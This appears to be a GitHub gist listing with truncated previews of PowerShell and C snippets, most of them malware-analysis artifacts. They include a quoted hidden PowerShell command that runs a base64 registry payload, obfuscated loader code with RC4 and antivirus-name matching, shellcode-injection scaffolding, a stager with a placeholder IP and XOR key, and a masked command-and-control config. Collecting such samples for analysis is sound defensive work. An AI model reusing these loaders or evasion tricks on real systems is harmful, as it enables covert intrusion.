This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
; was used to extract it from the registry and execute it: | |
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
; The following references were used to help comment the shellcode | |
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# From "LNK file" malware | |
function Get-Soft { | |
param ( | |
[Parameter(ValueFromPipeline=$true)] | |
[string[]]$ComputerName = $env:COMPUTERNAME, | |
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124)) | |
) | |
foreach ($comp in $ComputerName) { | |
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92) | |
foreach ($key in $keys) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function rsrzis { | |
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security"); | |
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core"); | |
$ErrorActionPreference = "SilentlyContinue"; | |
function wlc2 { | |
param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp) | |
[Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256; | |
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];} | |
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Formatting tweaked for readablity as an embedded gist, will not execute | |
# commented as well | |
Set-StrictMode -Version 2 | |
$DoIt = @' | |
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
$var_unsafe_native_methods = ( | |
[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False; | |
Function jpnm { | |
sal bifsynume Add-Type ; | |
if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'} | |
bifsynume @" | |
using System; | |
using System.Runtime.InteropServices; | |
public class tqjn | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# remove files that match a specified hash | |
$PATH = "c:\testing" | |
$HASH = "39DD73E4DAE46B506E7F9B41066F7F21E5D61DADD4D2B5806D31E364886C2D08" | |
$files = Get-ChildItem -Path $PATH -File | |
ForEach ($f in $files) | |
{ | |
$fullpath = "$PATH\$f" | |
$hashInfo = Get-FileHash $fullpath -Algorithm SHA256 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$IP = 'X.X.X.X' | |
$Port = 53 | |
$VirtualAlloc = $null | |
$CreateThread = $null | |
$WaitForSingleObject = $null | |
$XORKEY = 0x50 | |
function XorByteArr | |
{ | |
Param | |
( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Semi-deobfuscated PowerShell from malware analysis | |
function sdnfjshdklfhlj { | |
$ag = @{ | |
srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY'); | |
skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH'; | |
usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck')); | |
conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat') | |
reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp'); | |
encutf = [System.Text.Encoding]::UTF8; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#ifndef UNICODE | |
#define UNICODE | |
#endif | |
#include<windows.h> | |
int WINAPI wWinMain(HINSTANCE hinstance, HINSTANCE hprevinstance, PWSTR szCmdLine, int nCmdShow) | |
{ | |
wchar_t path[256]; | |
DWORD size = 256; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apt-get install python3-venv | |
python3 -m venv {env_dir} |
NewerOlder